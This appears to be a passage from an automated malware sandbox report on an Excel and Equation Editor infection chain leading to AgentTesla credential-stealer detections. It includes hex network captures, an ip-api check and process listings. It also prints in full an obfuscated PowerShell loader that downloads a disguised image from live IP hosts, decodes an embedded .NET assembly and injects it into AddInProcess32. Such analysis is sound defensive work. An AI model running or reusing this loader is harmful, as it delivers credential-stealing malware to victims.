                  Data Ascii: =AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgNABAAAwAADANAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAK0gP5xmYtV2czF2L8oQD+8mZulEdzVnc09CPgAiCN4Te0lmc1NWZz9CPgACIgoQD+MXZnVGbpZX
                  Jul 5, 2024 07:26:49.732924938 CEST1236INData Raw: 61 79 42 46 5a 6c 52 33 63 6c 56 58 63 6c 4a 33 4c 38 41 43 49 67 41 43 49 67 6f 51 44 2b 38 69 49 6c 4e 48 62 68 5a 6d 49 39 4d 33 63 6c 4e 32 59 42 6c 57 64 67 49 69 63 6c 74 32 62 32 35 57 53 7a 46 6d 49 39 77 57 5a 32 56 47 62 67 77 57 5a 32
                  Data Ascii: ayBFZlR3clVXclJ3L8ACIgACIgoQD+8iIlNHbhZmI9M3clN2YBlWdgIiclt2b25WSzFmI9wWZ2VGbgwWZ2VGTu9Wa0V3YlhXRkVGdzVWdxVmc8ACIgACIgACIK0gPiMjdu02chpTbvNWL0Z2bz9mcjlWbtMXYtVGajNnOuJXdi0zcuxWb4BycldWZslmdpJHUkVGdzVWdxVmc8ACIgACIgoQD+kHdpJXdjV2c8ACIgAiCN4jIyY
                  Jul 5, 2024 07:26:49.732934952 CEST1236INData Raw: 4d 41 41 44 41 77 41 51 41 41 41 51 41 34 44 41 41 41 38 47 41 6d 42 67 62 41 6b 45 41 6c 42 41 62 41 6b 47 41 47 42 77 5a 41 34 47 41 70 42 67 63 41 51 48 41 54 42 51 41 41 41 67 41 63 51 41 73 41 41 41 41 41 41 41 41 41 34 47 41 76 42 51 61 41
                  Data Ascii: MAADAwAQAAAQA4DAAA8GAmBgbAkEAlBAbAkGAGBwZA4GApBgcAQHATBQAAAgAcQAsAAAAAAAAA4GAvBQaAQHAhBAbAMHAuBQYAIHAUBAAAQAAkAAAAAAAvBgZA4GAJBQZAwGApBgRAIHAhBgVAEAAAAARAAAAAAAAAAAAAAAAAAAABAAAAQAAAAAAAAAA/AAAAAAABAAAAAAAAAQAAAAABAAA+/OB9CAAAAAAPBgRA4EAJBwXA4
                  Jul 5, 2024 07:26:49.733174086 CEST1236INData Raw: 44 49 49 51 58 53 55 42 46 48 4d 53 41 54 41 42 41 54 49 67 41 67 67 41 43 4f 67 67 41 56 4a 59 45 56 34 41 43 4f 34 67 41 64 4a 52 46 4f 67 67 41 68 46 52 46 4f 67 67 41 64 4a 52 46 48 63 67 48 4e 49 59 45 49 67 67 44 49 34 41 43 47 41 77 43 49
                  Data Ascii: DIIQXSUBFHMSATABATIgAggACOggAVJYEV4ACO4gAdJRFOggAhFRFOggAdJRFHcgHNIYEIggDI4ACGAwCIMACCASBIggDd4gDdIhDOIQXSUhDd4QCHMRDCGhDCIAIH4ACCEWEVYgDIIQVCGRFH0SgSEQ4AGRFI0SgS0BAAYQLBKRANJRFH4ACC0lEVYAC4HYEOggAVJYEV0SgSEQ4AGRFI4QHI0SgS0B+BGhDIIQYRUhDIIQXSU
                  Jul 5, 2024 07:26:49.733186007 CEST1236INData Raw: 45 46 63 51 43 49 34 67 44 44 63 51 42 49 34 51 43 4a 6b 51 42 48 63 41 43 41 34 52 48 49 67 41 43 46 63 51 43 68 4b 6f 45 64 4b 59 45 4f 55 77 41 41 6f 51 6d 43 4b 42 41 41 55 41 43 4f 67 51 42 64 51 77 42 48 67 41 47 49 55 51 48 42 51 41 41 49
                  Data Ascii: EFcQCI4gDDcQBI4QCJkQBHcACA4RHIgACFcQChKoEdKYEOUwAAoQmCKBAAUACOgQBdQwBHgAGIUQHBQAAI4QdREAAFgAmBKhDF0BCF0RIRUQHF0hCKcwEKoQhBKhCFGoEBUAAMgQBdoACEcwBI4gDC0lEV4QBdEpgSUQHF0RBdUQHVIoEO4QBdUQHNKoEF0RBd0ogSUQHOUQHRKoEF0BCIUQHF0RBd0cgSgQgCKRjCKRBdUQHIg
                  Jul 5, 2024 07:26:49.733202934 CEST1236INData Raw: 43 49 67 51 42 64 51 77 42 48 67 67 44 4f 49 51 59 52 55 52 41 68 44 59 45 56 34 67 44 4f 49 51 59 52 55 42 42 48 55 42 41 65 30 52 41 42 45 41 45 48 45 6c 45 41 41 43 42 4f 45 69 67 53 45 41 41 47 55 51 41 4e 4a 52 46 46 34 67 44 49 67 41 43 49
                  Data Ascii: CIgQBdQwBHggDOIQYRURAhDYEV4gDOIQYRUBBHUBAe0RABEAEHElEAACBOEigSEAAGUQANJRFF4gDIgACIggDdgACI4gDIgQcCKRBB0kEVExBagwAdMQHD0BCO0BCO4QCH8AAeEgCEwhDBACBI0mgSIwBGUjT20qV48bMI4QHO4gAAYAdSEQ4AGRFHgAdSEQ4AGRF0JxAHwAdSEQTSUhBIggDdAUgS4gDF0RBdAYgS4QBdUQHAG
                  Jul 5, 2024 07:26:49.733213902 CEST1236INData Raw: 43 51 45 6f 45 42 45 4f 67 52 55 42 51 42 4b 52 41 4e 4a 52 46 51 45 6f 45 51 45 6f 45 42 30 6b 45 56 77 55 67 53 34 51 42 64 34 67 44 41 46 6f 45 42 30 6b 45 56 73 77 42 72 77 51 67 53 45 51 34 41 47 52 46 49 77 51 67 53 45 51 54 53 55 78 42 4d
                  Data Ascii: CQEoEBEOgRUBQBKRANJRFQEoEQEoEB0kEVwUgS4QBd4gDAFoEB0kEVswBrwQgSEQ4AGRFIwQgSEQTSUxBMEoEB0kEV4gAhFRFMEwEAMhAhFRFAAiCMEoEB0kEV4gAVJYEV0QATAwECUlgRUBAgsADBKRANJRFOIQXSUBDMEoEB0kEV4gAdJRFBogDIwQgSEQ4AGRFMEoEB0kEV4gAVJYEVAUgSEQTSUBDBKBDBKRANJRFOIQYRU
                  Jul 5, 2024 07:26:49.733226061 CEST1236INData Raw: 43 4f 45 51 34 41 47 52 46 49 34 51 48 41 46 6f 45 42 30 6b 45 56 41 55 67 53 41 55 67 53 34 41 55 42 4b 68 44 4f 34 67 44 4f 45 51 54 53 55 68 44 41 46 6f 45 42 30 6b 45 56 41 78 42 75 67 41 43 46 30 42 43 45 63 77 42 49 67 67 44 46 30 42 43 44
                  Data Ascii: COEQ4AGRFI4QHAFoEB0kEVAUgSAUgS4AUBKhDO4gDOEQTSUhDAFoEB0kEVAxBugACF0BCEcwBIggDF0BCDgACIgQBd4ADHABCD0xAdMQHD0BCO0BQBKhDd4gDO4QHO4QHI4QHOAUgSEQTSUxEHYCCI4QHI4QHAFoEO4QHO4QHOAUgSEQTSUBDHoBCI4QHI4QHO0hDO4gDO4gDd4gDdAUgSEQTSUBEH0BCOUhgS4QBdEdgSUhgSU
                  Jul 5, 2024 07:26:49.733237982 CEST332INData Raw: 42 43 41 51 42 49 67 41 43 4f 51 77 42 47 34 51 2f 42 4b 52 41 67 59 51 2b 42 4b 42 41 67 55 41 43 31 48 6f 45 42 41 69 42 78 48 6f 45 41 41 53 42 49 6b 6e 45 35 48 6f 45 49 34 51 48 41 46 6f 45 31 48 6f 45 78 48 6f 45 74 48 6f 45 4f 41 55 67 53
                  Data Ascii: BCAQBIgACOQwBG4Q/BKRAgYQ+BKBAgUAC1HoEBAiBxHoEAASBIknE5HoEI4QHAFoE1HoExHoEtHoEOAUgSEQTSUxCH8BCI4QHD0hDO0hDQFoEOAUgSEQTSUhCHcBHc4gAAUACDEAIEgACF0RBI4gDHcgCIMQHD0BCO0RBd4gDAFoEO0hDLcAFIAUgSAUgSEQTSUxAH0ACAMRAgUAgBKRANJRFHkegR4QHO0hAgkgDOUegSIAAHg
                  Jul 5, 2024 07:26:49.733251095 CEST1236INData Raw: 48 46 30 78 41 67 67 51 42 64 55 51 48 52 48 6f 45 43 41 53 43 5a 48 59 45 42 45 41 49 47 45 58 45 42 45 41 49 46 67 51 42 64 34 51 7a 42 4b 68 44 52 48 6f 45 4e 48 6f 45 46 30 42 43 48 49 52 41 54 41 41 49 45 41 55 67 53 34 67 41 4a 48 59 45 56
                  Data Ascii: HF0xAggQBdUQHRHoECASCZHYEBEAIGEXEBEAIFgQBd4QzBKhDRHoENHoEF0BCHIRATAAIEAUgS4gAJHYEVkQATAwECkcgRUBAgsAQBKhDCUcgSURCBMBATIQxBKRFAAyCAFoEOIQwBGRFJAUgS4gA9GoEVkgDOIQXSUhBO4gAdJRFOIQwBGRFMEwEAMhABHYEVAAIL4gDC0lEV4gA9GoEVwQATAwEC0bgSUBAgsAQBKhDC0lEVg
                  Jul 5, 2024 07:26:49.737747908 CEST1236INData Raw: 43 59 49 51 42 64 30 68 45 4a 63 51 44 49 55 58 45 4f 30 78 41 48 63 41 43 64 49 42 43 44 63 67 42 63 45 51 41 41 51 67 41 51 77 52 41 43 41 67 42 49 77 68 41 44 63 51 42 4e 45 51 41 67 51 51 56 42 4b 52 41 42 41 69 42 78 45 42 41 41 51 51 54 42
                  Data Ascii: CYIQBd0hEJcQDIUXEO0xAHcACdIBCDcgBcEQAAQgAQwRACAgBIwhADcQBNEQAgQQVBKRABAiBxEBAAQQTBKBAgUACY4ACEcgBIgAWRgVEEcACQJRAKQACQJBUSAlEEcQCMJRAKQAAeAgHA4BEA4xABABDIwkEMJBTSQwBJ4gDBIAIF4gDCIAAF4AHBACBBFoEAASBFFoEAASB9EoEAASBIUUgSUUgSIQQBKRQBKRPBKROBKBCHY


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  18192.168.2.2249179208.95.112.1803436C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                  TimestampBytes transferredDirectionData
                  Jul 5, 2024 07:26:50.893003941 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                  Host: ip-api.com
                  Connection: Keep-Alive
                  Jul 5, 2024 07:26:51.372231960 CEST175INHTTP/1.1 200 OK
                  Date: Fri, 05 Jul 2024 05:26:51 GMT
                  Content-Type: text/plain; charset=utf-8
                  Content-Length: 6
                  Access-Control-Allow-Origin: *
                  X-Ttl: 38
                  X-Rl: 39
                  Data Raw: 66 61 6c 73 65 0a
                  Data Ascii: false
                  Jul 5, 2024 07:26:51.583098888 CEST175INHTTP/1.1 200 OK
                  Date: Fri, 05 Jul 2024 05:26:51 GMT
                  Content-Type: text/plain; charset=utf-8
                  Content-Length: 6
                  Access-Control-Allow-Origin: *
                  X-Ttl: 38
                  X-Rl: 39
                  Data Raw: 66 61 6c 73 65 0a
                  Data Ascii: false


                  Click to jump to process

                  Click to jump to process

                  Click to dive into process behavior distribution

                  Click to jump to process

                  Target ID:0
                  Start time:01:25:30
                  Start date:05/07/2024
                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  Wow64 process (32bit):false
                  Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                  Imagebase:0x13f040000
                  File size:28'253'536 bytes
                  MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:false

                  Target ID:2
                  Start time:01:26:18
                  Start date:05/07/2024
                  Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Imagebase:0x400000
                  File size:543'304 bytes
                  MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:5
                  Start time:01:26:20
                  Start date:05/07/2024
                  Path:C:\Windows\SysWOW64\wscript.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\controlfiredatinloverforxlammfile.vbs"
                  Imagebase:0xec0000
                  File size:141'824 bytes
                  MD5 hash:979D74799EA6C8B8167869A68DF5204A
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:6
                  Start time:01:26:21
                  Start date:05/07/2024
                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "INVOkE-EXpRessIon ( ('oiL'+'li'+'n'+'k = Olshttp'+'://91.92.254.194/imge/new-image'+'_v.jpgOls; oiLwebClient = New-Object'+' System.Net.WebClient; try { oiLdownloadedData = oi'+'LwebClient.DownloadData(oiLlink) } catch { Write-Host OlsFailed To download data from oiLlinkOls -ForegroundColor Red; exit }; if (oiLdownloadedData -ne oiLnull) { oiLimageText = [Sy'+'stem.T'+'ex'+'t.Encoding]::UTF8.GetString'+'(oiLdownloadedData); oiLstartFlag = Ols<<BASE64_START>>Ols; oiLendFlag = Ols<<BASE64_END>>Ols; oiLstartIndex = oiLimageText.IndexOf(oiLstartFlag); oiLendIndex = oiLimageText.IndexOf(oiLendFlag); if (oiLstartIndex -ge 0 -and oiLendIn'+'dex -gt oiLstartIndex) { oiLstartInd'+'ex += oiLstartFlag.Length; oiLbase64Length = oiLendIn'+'dex - oiLstartInd'+'ex; oiLbase64Command = oiLimageText.Substri'+'ng(oiLstartIndex, oiLbase64Lengt'+'h); oiLcommandBytes = [System.Convert]::FromBase64String(oiLbase64Command); oiL'+'loadedAssembly = [System.Reflection.Assembly]::Load(oiLcomm'+'andBytes); oiLtype = oiLloadedAssembly.GetType(OlsRunPE.HomeOls); oiLmethod = oiLtype.GetMethod(OlsVAIOls).Invoke(oiLnull,'+' [object[]] (Olstxt.4446sabbbbbbbewmadam/441.871.64.8'+'91//:ptthOls , Olsdesativad'+'oOls , OlsdesativadoOls , OlsdesativadoOls,OlsAddInProcess32Ols,OlsOls)) } }Set Scriptblock oiLlink = Olshttp://91.92.254.194/imge/new-image_v.jpgOls; oiLwebClient ='+' New-Object System.Net.WebClient; try { oi'+'LdownloadedData = oiLwebClient.DownloadData(oiLlink) } catch { Write-Host OlsFailed To down'+'load data from oiLlinkOls -ForegroundColor Red; exit }; if (oiLdownloadedData -ne oi'+'Lnull) { oiLimageText = [System.T'+'ext.Encoding]::UTF8.GetString('+'oiLdownloadedData); oiLstartFlag = Ols<<BASE64_START>>Ols; oiLendFlag = Ols<<BASE64_END>>Ols; oiLstartIndex = oiLimageText.IndexOf(oiLstartFlag); oiLen'+'dIndex = oiLimageText.IndexOf(oiLendFlag); if (oiLstartIndex -ge 0 -and oiLendInde'+'x -gt oiLstartIndex) { oiLstartIndex += '+'oiLstartFlag.Length; oiLbase64Length = oiLendIndex - oiLstartIndex; oiLbase64Command ='+' oiLimageText.Substring(oiLstartIndex'+', oiLbase64Length); oi'+'LcommandBytes = [System.Convert]::FromBase64String(oiLbase64Command); oiLloadedAssembly = [System.Reflection.'+'Assembly]::Load(oiLcommandBytes); oiLtype = '+'oiLloadedAssembly.GetType(Ols'+'RunPE.HomeOl'+'s); oiLmethod = oiLtype.GetMethod(Ols'+'VAIOl'+'s).Invoke(oiLnull, [object[]] (Olstxt.4'+'446sab'+'bbbbbbewmadam/441.871.64.891//:ptthOls , Olsdesativ'+'adoOls , OlsdesativadoOls , Olsdesati'+'vadoOls,OlsAddInProcess32Ols,OlsOls)) } }Set Scr'+'iptblock oiLlink '+'= Olshttp://91.92.2'+'54.194/imge/new-image_v.jpgOls; oiLwebClient = New-'+'Object System.Net.WebClient; try { oiLdownloadedData '+'= oiLw'+'ebClient.DownloadData(oiLlink) } catch { Write-Host OlsFailed To download data '+'from oiLlinkOls -ForegroundColor Red; exit }; if (oiLdownloadedData'+' -ne oiLnu'+'ll) { oiLimageText = [System.Text.Encoding]::U'+'TF8.GetString(oiLdown'+'loadedData); oiLstartFlag = Ols<<BASE64_START>>Ols; oiLendFlag = Ol'+'s<<BASE64_END>>Ols; oiLstartIndex = oiLimageText.IndexOf(oiLstartFlag); oiLendIndex = oiLimageText.IndexOf(oiLendFlag); if (oiLs'+'tartIndex -ge 0 -and oiLendIndex -gt oiLstartIn'+'dex) { oiLstartIndex += '+'oiLstartFlag.Length; oiLbase64Length = oiLendIndex - o'+'iLstartIndex; oiLbase64Command = oiLimageText.Substring(oiLstartInd'+'ex, oiLbase64Length); oiLcommandBytes = [System.Convert]::FromBase64St'+'ring(oiLbase64Command); oiLl'+'oadedAssembly = [System.Reflection.Assembly]::Load(oiLcommandBytes); oiLtype = oiLloadedAssembly.GetType(OlsRu'+'nPE.HomeO'+'ls); oiLmet'+'hod = oiLtype.GetMethod(Ol'+'sVA'+'IOls).Invoke(oi'+'Lnull, [object[]'+'] (Olstxt.4446'+'sabbbbbbbewmadam/441.871.64.891//:ptthOls , OlsdesativadoOls , OlsdesativadoOls , OlsdesativadoOls,OlsAddInProcess32Ols,OlsOls)) } }Set Scriptblock oiLlink = Olshttp://91.92.254.137/imge/new-image_'+'j.jpgOls; oiLwebClient = New-Object System.Net.WebClient; try { o'+'iLdownloadedData = oiLwebClient.Down'+'loadData(oiLlink) } catch { Write-Host OlsFailed To download data from oiLlin'+'kOls -F'+'oregroundColor Red; exit }; if (oiLdownloadedData '+'-ne oiLnull) { oiLimageText = [System.Text.Encoding]::UT'+'F8.GetString(oiLdownloadedData); oiLstartFlag = Ols<<BASE64_START>>Ols; oiLendFlag = Ols<<BASE64_END>>Ols; oiLstartIndex = oiLimageText.IndexOf(oiLstartFlag); oiLendIndex = oiLimageText.IndexOf(oiLendFlag); if (oiLstartIndex -ge 0 -and oiLendIndex -gt oiLstartIndex) { oiLsta'+'rtIndex += oiLstartFlag.Leng'+'th; oiLbase64Length'+' = oiLendIndex - oiLstartIndex; oiLbase64Command = o'+'iLimageText.Substring(oiLstartIndex, oiLbase64Length); oiLcommandBytes = [System.Convert]::FromBase64String'+'(oiLbas'+'e64'+'Command)'+'; oiLloadedAssembly = [System.Reflection.Assembly]::Load(oiLcommandBytes); oiLtype = oiLloadedAssembly.GetType(OlsRunPE'+'.HomeOls); oiLmethod = oiLtype.GetMethod(OlsVAIOls).Invoke(oiLnull, [object[]] (Olstxt.4446sabbbbbbbewmadam/441.871.64.891//:ptthOls , OlsdesativadoOls , Ol'+'sdesat'+'ivadoOls , OlsdesativadoOls,OlsAddInProcess32Ols,OlsdesativadoOls)) } }Set Scriptblock oiLlink = Olshttp://91.92.254.194/imge/new-image_v.jpgOls; oiLwebClient = New-Object System.Net.WebClient; try { oiLdownloadedData'+' = oiLwebClient.DownloadData'+'(oi'+'Llink) } catch { Wri'+'te-Host OlsFailed'+' To download data from oiLlinkOls -ForegroundCol'+'or Red; exit }; if ('+'oiLdownloadedData -ne oiLnull) { oiLimageText = [System.Text.Encoding]::UTF8.GetString'+'(oiLdownloadedD'+'ata); oiLstartFlag = Ols<<BASE64_START>>Ols; oiLendFlag = Ols<<BASE64_END>>Ols; oiLstartIndex = oiLimageText.IndexOf(oi'+'LstartFlag); oiLendIndex = oiLimageText.I'+'ndexOf(oiLendFlag); if (oiLstartIndex -ge 0 -and oiLendIndex -gt oiLstartIndex) { oiLstartIndex += oiLst'+'ar'+'tFlag.Le'+'ngt'+'h; oiLbase64Length = oiLendIndex - oiLstartIndex; oiLbase64Command = oi'+'LimageText'+'.Substring(oiLstar'+'tIndex, oi'+'Lbase64Length)'+'; '+'oi'+'LcommandBytes = [System.Conv'+'e'+'rt'+']::FromBase64String(oiLbase64Command); oiLloadedA'+'ssembly = [System.Ref'+'lection.Assembly]::Load(oiLcommandBytes); oiLtyp'+'e = oiLloadedAssembly.GetType(OlsRunPE.HomeOls); oiLmethod = oiLtype.GetMethod(OlsVAIOls).Invoke(oiLnull, [object[]] (Olstxt.4446sa'+'bbbbbbbe'+'wmadam/441.871'+'.64.891//:ptthOls , OlsdesativadoOls , OlsdesativadoOls , OlsdesativadoOls,Ols'+'AddInProcess32Ols,OlsO'+'ls)) } }Set Scriptblock oiLlink = Olshttp://91.92'+'.254.'+'19'+'4/imge/new-image_v.jpgOls; oiLwebClient = New-Object System.Net.WebClient; try {'+' oiLdow'+'nloadedData = oiLwebClient.DownloadData(oiLlink) } catch { Write-Host '+'OlsFailed To download data from oiLlink'+'Ols -ForegroundColor Red; exit }; if (oiLdownloadedData -ne oiLnull) { oiLimageText = ['+'System.Text.Encoding]::UTF8.GetString(oiLd'+'ownloadedData); oiLstartFlag = Ols<<BASE64_START>>Ols; oiL'+'endFlag = Ols<<BASE64_END>>Ols; oiLstartIndex = oiLimageText.IndexOf(oiLstartFlag); oiLendIndex = oiLimageText.IndexOf(oiLendFlag);'+' if (oiLstartIndex -ge 0 -and oiLendIndex -gt oiLstartIndex) { oiLstartIndex += oiLstar'+'tFlag.Length; oiLbase64Length = oiLendIndex - oiLstartIndex; oiLbase64Command = oiLimageText.Substring(oiLstartIndex, oiLbase64Length); oiLcommandBytes = [System.Convert]::FromBase64String(oiLbase64Command); oiLload'+'ed'+'Assembly = [System.Reflection.Assembly]::Load'+'(oiLcommandBytes); oiLt'+'ype = oiLloadedAssembly.GetType(OlsRunPE.HomeOls); oiLmethod = oiLty'+'pe.GetMethod(OlsV'+'AIOls).Invoke(oiLnull, [object[]] (Olstxt.56esaberiflortnoc/441.871.64.891//:pt'+'thOls , Ol'+'sdesativadoOls , '+'OlsdesativadoOls , Olsdesativa'+'doOls,OlsAddInProcess32Ols,OlsOls)) } }').RePlAcE('Ols',[sTrInG][ChaR]39).RePlAcE(([ChaR]111+[ChaR]105+[ChaR]76),[sTrInG][ChaR]36) )"
                  Imagebase:0x1390000
                  File size:427'008 bytes
                  MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.518863919.0000000003D60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.518863919.0000000003D60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.518863919.000000000411B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.518863919.000000000411B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:high
                  Has exited:true

                  Target ID:8
                  Start time:01:26:27
                  Start date:05/07/2024
                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                  Imagebase:0xa50000
                  File size:42'056 bytes
                  MD5 hash:EFBCDD2A3EBEA841996AEF00417AA958
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.479098901.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.479098901.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.479192755.0000000002425000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:moderate
                  Has exited:true

                  Target ID:9
                  Start time:01:26:32
                  Start date:05/07/2024
                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                  Imagebase:0xa50000
                  File size:42'056 bytes
                  MD5 hash:EFBCDD2A3EBEA841996AEF00417AA958
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate
                  Has exited:true

                  Target ID:10
                  Start time:01:26:32
                  Start date:05/07/2024
                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                  Imagebase:0xa50000
                  File size:42'056 bytes
                  MD5 hash:EFBCDD2A3EBEA841996AEF00417AA958
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.485482053.00000000022B5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:moderate
                  Has exited:true

                  Target ID:11
                  Start time:01:26:34
                  Start date:05/07/2024
                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                  Imagebase:0xa50000
                  File size:42'056 bytes
                  MD5 hash:EFBCDD2A3EBEA841996AEF00417AA958
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.492812954.0000000002415000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:moderate
                  Has exited:true

                  Target ID:12
                  Start time:01:26:38
                  Start date:05/07/2024
                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                  Imagebase:0xa50000
                  File size:42'056 bytes
                  MD5 hash:EFBCDD2A3EBEA841996AEF00417AA958
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.504664614.00000000022E5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:moderate
                  Has exited:true

                  Target ID:13
                  Start time:01:26:43
                  Start date:05/07/2024
                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                  Imagebase:0xa50000
                  File size:42'056 bytes
                  MD5 hash:EFBCDD2A3EBEA841996AEF00417AA958
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate
                  Has exited:true

                  Target ID:14
                  Start time:01:26:49
                  Start date:05/07/2024
                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                  Imagebase:0xa50000
                  File size:42'056 bytes
                  MD5 hash:EFBCDD2A3EBEA841996AEF00417AA958
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.616770593.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.616770593.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.617260829.0000000002255000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:moderate
                  Has exited:false

                  Reset < >

                    Execution Graph

                    Execution Coverage:23%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:64.4%
                    Total number of Nodes:45
